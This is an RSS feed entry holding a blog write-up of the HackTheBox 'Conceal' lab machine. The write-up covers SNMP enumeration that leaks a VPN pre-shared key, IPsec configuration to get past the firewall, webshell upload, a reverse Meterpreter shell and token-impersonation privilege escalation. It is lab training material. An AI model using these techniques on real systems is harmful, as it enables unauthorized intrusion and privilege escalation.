<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Tudor Gheorghiu</title>
    <description>The latest articles on DEV Community by Tudor Gheorghiu (@tudorog).</description>
    <link>https://dev.to/tudorog</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F493536%2F41ce8652-8dd8-48d6-a6ff-b6f8e435b32e.jpeg</url>
      <title>DEV Community: Tudor Gheorghiu</title>
      <link>https://dev.to/tudorog</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/tudorog"/>
    <language>en</language>
    <item>
      <title>Conceal - HackTheBox Writeup</title>
      <dc:creator>Tudor Gheorghiu</dc:creator>
      <pubDate>Sun, 18 Oct 2020 17:57:47 +0000</pubDate>
      <link>https://dev.to/tudorog/conceal-hackthebox-writeup-1hgn</link>
      <guid>https://dev.to/tudorog/conceal-hackthebox-writeup-1hgn</guid>
      <description>&lt;h1&gt;
  
  
  HTB Conceal Box Write-up
&lt;/h1&gt;

&lt;p&gt;Conceal was a hard box when it comes to Initial Enumeration and the firewall, but after that, the user part was pretty straightforward (shell was a little tricky since it's a Windows box). Root wasn't hard at all, but you had to fiddle around a little to make the exploit work.&lt;/p&gt;

&lt;h2&gt;
  
  
  Initial Enumeration
&lt;/h2&gt;

&lt;p&gt;I started the initial enumeration of this box with the usual nmap scan, but it was really slow. That usually means there is a firewall, so a full nmap scan wasn't feasible. Instead, I used masscan, which is much faster because it sends its probes asynchronously and processes the responses as they arrive, to see which ports are reachable from outside the firewall. You can read more about masscan &lt;a href="https://github.com/robertdavidgraham/masscan" rel="noopener noreferrer"&gt;here&lt;/a&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;root@fast:/home/roacker# masscan -p 1-65535,U:1-65535 --rate=1000 10.10.10.116 -e tun0
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Starting masscan 1.0.3 (http://bit.ly/14GZzcT) at 2019-02-13 16:37:08 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 161/udp on 10.10.10.116
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;So port 161/udp is open. Let's run an nmap service scan against it:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;root@fast:/home/roacker# nmap -Pn -sV -sU -p 161 10.10.10.116

Starting Nmap 7.60 ( https://nmap.org ) at 2019-02-13 10:39 CST
Nmap scan report for 10.10.10.116
Host is up.

PORT  STATE SERVICE VERSION
161/udp open snmp  SNMPv1 server (public)
Service Info: Host: Conceal

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.45 seconds
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Great! It's SNMP. Let's enumerate this service. I will use snmpwalk with the snmp-mibs plugin installed, which will make the output more human readable. Let's see what data we can obtain through SNMP:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;root@fast:/home/roacker# snmpwalk -mALL -c public -v 2c 10.10.10.116
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;The output is huge, so I am only going to select what I think is interesting:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;SNMPv2-MIB::sysObjectID.0 = OID: SNMPv2-SMI::enterprises.311.1.1.3.1.1
DISMAN-EVENT-MIB::sysUpTimeInstance = Timeticks: (3147631) 8:44:36.31
SNMPv2-MIB::sysContact.0 = STRING: IKE VPN password PSK - 9C8B1A372B1878851BE2C097031B6E43
SNMPv2-MIB::sysName.0 = STRING: Conceal
SNMPv2-MIB::sysLocation.0 = STRING:

TCP-MIB::tcpConnState.0.0.0.0.21.0.0.0.0.0 = INTEGER: listen(2)
TCP-MIB::tcpConnState.0.0.0.0.80.0.0.0.0.0 = INTEGER: listen(2)
TCP-MIB::tcpConnState.0.0.0.0.135.0.0.0.0.0 = INTEGER: listen(2)
TCP-MIB::tcpConnState.0.0.0.0.445.0.0.0.0.0 = INTEGER: listen(2)
TCP-MIB::tcpConnState.0.0.0.0.49664.0.0.0.0.0 = INTEGER: listen(2)
TCP-MIB::tcpConnState.0.0.0.0.49665.0.0.0.0.0 = INTEGER: listen(2)
TCP-MIB::tcpConnState.0.0.0.0.49666.0.0.0.0.0 = INTEGER: listen(2)
TCP-MIB::tcpConnState.0.0.0.0.49667.0.0.0.0.0 = INTEGER: listen(2)
TCP-MIB::tcpConnState.0.0.0.0.49668.0.0.0.0.0 = INTEGER: listen(2)
TCP-MIB::tcpConnState.0.0.0.0.49669.0.0.0.0.0 = INTEGER: listen(2)
TCP-MIB::tcpConnState.0.0.0.0.49670.0.0.0.0.0 = INTEGER: listen(2)

HOST-RESOURCES-MIB::hrDeviceDescr.7 = STRING: WAN Miniport (IKEv2)
HOST-RESOURCES-MIB::hrDeviceDescr.8 = STRING: WAN Miniport (PPTP)
HOST-RESOURCES-MIB::hrDeviceDescr.9 = STRING: Microsoft Kernel Debug Network Adapter
HOST-RESOURCES-MIB::hrDeviceDescr.10 = STRING: WAN Miniport (L2TP)
HOST-RESOURCES-MIB::hrDeviceDescr.11 = STRING: Teredo Tunneling Pseudo-Interface
HOST-RESOURCES-MIB::hrDeviceDescr.12 = STRING: WAN Miniport (IP)
HOST-RESOURCES-MIB::hrDeviceDescr.13 = STRING: WAN Miniport (SSTP)
HOST-RESOURCES-MIB::hrDeviceDescr.14 = STRING: WAN Miniport (IPv6)
HOST-RESOURCES-MIB::hrDeviceDescr.15 = STRING: Intel(R) 82574L Gigabit Network Connection
HOST-RESOURCES-MIB::hrDeviceDescr.16 = STRING: WAN Miniport (PPPOE)
HOST-RESOURCES-MIB::hrDeviceDescr.17 = STRING: WAN Miniport (Network Monitor)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;We leaked a list of listening services, which will be useful once we bypass the firewall. I also noticed that an IPsec service is running and that the IKE pre-shared key is exposed in the sysContact field, stored as a hash. We can easily crack that with &lt;a href="https://crackstation.net" rel="noopener noreferrer"&gt;CrackStation&lt;/a&gt;:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2F33j60nz5xeoa06agufn8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2F33j60nz5xeoa06agufn8.png" alt="Crackstation Cracked Password"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We now have the pre-shared key: Dudecake1!&lt;/p&gt;

&lt;p&gt;Enumerating with another tool called &lt;a href="https://github.com/pwnieexpress/pwn_plug_sources/tree/master/src/snmpenum" rel="noopener noreferrer"&gt;snmpenum&lt;/a&gt; can give us some other cool results:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;----------------------------------------
    LISTENING TCP PORTS
----------------------------------------

21
80
135
445
49664
49665
49666
49667
49668
49669
49670

----------------------------------------
    USERS
----------------------------------------

Guest
Destitute
Administrator
DefaultAccount
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Great! We also leaked a username: Destitute.&lt;/p&gt;

&lt;p&gt;We now know how to bypass the firewall: establishing an IPsec VPN tunnel to the box will let us reach the other services behind it. Let's get to work!&lt;/p&gt;

&lt;h2&gt;
  
  
  Bypassing Firewall
&lt;/h2&gt;

&lt;p&gt;This was the hardest part of the box. Getting the config file correct in order to successfully connect is not as easy as you may think. It took me 2 days to get the config file correct.&lt;/p&gt;

&lt;p&gt;First we will need an IPsec client on our Ubuntu machine. We can use strongSwan, which is the updated and maintained fork of OpenSwan. You can install it with the following command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;apt-get &lt;span class="nb"&gt;install &lt;/span&gt;strongswan
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;We have everything we need for the IPsec tunnel (our IP: 10.10.13.11 | VPN IP: 10.10.10.116 | PSK: Dudecake1!) except the IKE phase parameters, which ike-scan can retrieve fairly easily:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;root@fast:/home/roacker# ike-scan 10.10.10.116
Starting ike-scan 1.9.4 with 1 hosts &lt;span class="o"&gt;(&lt;/span&gt;http://www.nta-monitor.com/tools/ike-scan/&lt;span class="o"&gt;)&lt;/span&gt;
10.10.10.116  Main Mode Handshake returned &lt;span class="nv"&gt;HDR&lt;/span&gt;&lt;span class="o"&gt;=(&lt;/span&gt;CKY-R&lt;span class="o"&gt;=&lt;/span&gt;838e57d6429c37d2&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="nv"&gt;SA&lt;/span&gt;&lt;span class="o"&gt;=(&lt;/span&gt;&lt;span class="nv"&gt;Enc&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;3DES &lt;span class="nv"&gt;Hash&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;SHA1 &lt;span class="nv"&gt;Group&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;2:modp1024 &lt;span class="nv"&gt;Auth&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;PSK &lt;span class="nv"&gt;LifeType&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;Seconds LifeDuration&lt;span class="o"&gt;(&lt;/span&gt;4&lt;span class="o"&gt;)=&lt;/span&gt;0x00007080&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="nv"&gt;VID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;1e2b516905991c7d7c96fcbfb587e46100000009 &lt;span class="o"&gt;(&lt;/span&gt;Windows-8&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="nv"&gt;VID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;4a131c81070358455c5728f20e95452f &lt;span class="o"&gt;(&lt;/span&gt;RFC 3947 NAT-T&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="nv"&gt;VID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;90cb80913ebb696e086381b5ec427b1f &lt;span class="o"&gt;(&lt;/span&gt;draft-ietf-ipsec-nat-t-ike-02&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="nv"&gt;VID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;4048b7d56ebce88525e7de7f00d6c2d3 &lt;span class="o"&gt;(&lt;/span&gt;IKE Fragmentation&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="nv"&gt;VID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;fb1de3cdf341b7ea16b7e5be0855f120 &lt;span class="o"&gt;(&lt;/span&gt;MS-Negotiation Discovery Capable&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="nv"&gt;VID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;e3a5966a76379fe707228231e5ce8652 
&lt;span class="o"&gt;(&lt;/span&gt;IKE CGA version 1&lt;span class="o"&gt;)&lt;/span&gt;

Ending ike-scan 1.9.4: 1 hosts scanned &lt;span class="k"&gt;in &lt;/span&gt;0.070 seconds &lt;span class="o"&gt;(&lt;/span&gt;14.20 hosts/sec&lt;span class="o"&gt;)&lt;/span&gt;&lt;span class="nb"&gt;.&lt;/span&gt; 1 returned handshake&lt;span class="p"&gt;;&lt;/span&gt; 0 returned notify
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;So the IKE proposal is going to be 3des-sha1-modp1024. Let's build our ipsec.conf file (in /etc/ipsec.conf):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;config setup
 charondebug="all"

conn conceal
 keyexchange=ikev1
 ike=3des-sha1-modp1024
 esp=3des-sha1
 leftid=Destitute
 left=10.10.13.11
 leftsubnet=10.10.13.0/24
 leftauth=psk
 rightid=%any
 right=10.10.10.116
 rightsubnet=10.10.10.116[tcp/%any]
 rightauth=psk
 auto=add
 type=transport
 fragmentation=yes
 keyingtries=1

include /var/lib/strongswan/ipsec.conf.inc
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;We can now build our ipsec.secrets file (/etc/ipsec.secrets) using the username we leaked from the initial SNMP scan (Destitute):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# This file holds shared secrets or RSA private keys for authentication.

# RSA private key for this host, authenticating it to any other host
# which knows the public part.

# this file is managed with debconf and will contain the automatically created private key
#include /var/lib/strongswan/ipsec.secrets.inc
#
Destitute %any : PSK Dudecake1!
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Now for the moment of truth: we are going to connect to the VPN:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;root@fast:~/conceal# systemctl start ipsec.service
root@fast:~/conceal# ipsec up conceal
initiating Main Mode IKE_SA conceal[1] to 10.10.10.116
generating ID_PROT request 0 [ SA V V V V V ]
sending packet: from 10.10.13.11[500] to 10.10.10.116[500] (236 bytes)
received packet: from 10.10.10.116[500] to 10.10.13.11[500] (208 bytes)
parsed ID_PROT response 0 [ SA V V V V V V ]
received MS NT5 ISAKMPOAKLEY vendor ID
received NAT-T (RFC 3947) vendor ID
received draft-ietf-ipsec-nat-t-ike-02\n vendor ID
received FRAGMENTATION vendor ID
received unknown vendor ID: fb:1d:e3:cd:f3:41:b7:ea:16:b7:e5:be:08:55:f1:20
received unknown vendor ID: e3:a5:96:6a:76:37:9f:e7:07:22:82:31:e5:ce:86:52
generating ID_PROT request 0 [ KE No NAT-D NAT-D ]
sending packet: from 10.10.13.11[500] to 10.10.10.116[500] (244 bytes)
received packet: from 10.10.10.116[500] to 10.10.13.11[500] (260 bytes)
parsed ID_PROT response 0 [ KE No NAT-D NAT-D ]
generating ID_PROT request 0 [ ID HASH ]
sending packet: from 10.10.13.11[500] to 10.10.10.116[500] (76 bytes)
received packet: from 10.10.10.116[500] to 10.10.13.11[500] (68 bytes)
parsed ID_PROT response 0 [ ID HASH ]
IKE_SA conceal[1] established between 10.10.13.11[Destitute]...10.10.10.116[10.10.10.116]
scheduling reauthentication in 10019s
maximum IKE_SA lifetime 10559s
generating QUICK_MODE request 2689023240 [ HASH SA No ID ID ]
sending packet: from 10.10.13.11[500] to 10.10.10.116[500] (196 bytes)
received packet: from 10.10.10.116[500] to 10.10.13.11[500] (188 bytes)
parsed QUICK_MODE response 2689023240 [ HASH SA No ID ID ]
CHILD_SA conceal{1} established with SPIs cdb43748_i e05fc992_o and TS 10.10.13.11/32 === 10.10.10.116/32[tcp]
connection 'conceal' established successfully
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fdwphnme4x1wj2lo8mwfe.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fdwphnme4x1wj2lo8mwfe.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We are now connected. We can also reach the internal services, like the IIS web server on port 80 or the FTP server (which allows anonymous login) on port 21:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2F3ammnsachnbww3opvrrq.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2F3ammnsachnbww3opvrrq.png" alt="upload"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  User
&lt;/h2&gt;

&lt;p&gt;This is now pretty straightforward. We will just need to upload an ASP shell to the IIS server and get reverse access. We should use Meterpreter, since we will need it for root.&lt;/p&gt;

&lt;p&gt;Running dirbuster on port 80 will reveal an Upload directory:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fe0rp1i1h1uhlqhoy7qbz.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fe0rp1i1h1uhlqhoy7qbz.png" alt="IIS"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;After doing some recon I figured out that everything we upload to the FTP server ends up under /upload on the web server, so let's upload a webshell (I used one I found on GitHub, but you can use whatever you like; RCE is all that matters):&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fpd0g0bhfz8u09734j8pa.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fpd0g0bhfz8u09734j8pa.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We have user!&lt;/p&gt;

&lt;h2&gt;
  
  
  Root
&lt;/h2&gt;

&lt;p&gt;Before we do anything else, we should use msfvenom to create a proper reverse TCP Meterpreter payload and execute it from the webshell:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fkm6bhj3gotltcwwcjpbp.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fkm6bhj3gotltcwwcjpbp.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We execute it and get a reverse meterpreter shell:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fqa7bi0hy02pylwphtrra.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fqa7bi0hy02pylwphtrra.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Here, I tried using meterpreter's getsystem autopwn, but it didn't work. This is where I made a mistake: I thought that normal exploits wouldn't work, and I would need to find a special way to privesc, meaning I skipped my normal enumeration. This set me off in the wrong direction.&lt;/p&gt;

&lt;p&gt;After not finding anything useful, I decided to enumerate more. I ran whoami /priv to list my privileges, and it showed that the account can impersonate tokens. Bingo!&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fl75b0wypjink2zm1vm2d.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fl75b0wypjink2zm1vm2d.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This is where I got stuck again. I tried using Hot Potato and different variations of it in order to steal an NT AUTHORITY token and use it to spawn a root shell, but none of the potato exploits worked. I was looking at &lt;a href=""&gt;JuicyPotato&lt;/a&gt;'s repository when I found out they had a massive DB of CLSIDs. I took one of them so I could do the impersonation manually. I then generated another msfvenom payload that spawns a reverse shell on a different port, and impersonated that token in order to launch it:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fspcrjvt4mzd5v8e4adk1.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fspcrjvt4mzd5v8e4adk1.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Let's take a look at the meterpreter shell I got:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2F6j2ci2yy709xke15aogy.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2F6j2ci2yy709xke15aogy.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Great! Let's get root!&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Ffk18ghqshomeg15xp75l.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Ffk18ghqshomeg15xp75l.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>pentest</category>
      <category>hackthebox</category>
      <category>hacking</category>
    </item>
  </channel>
</rss>
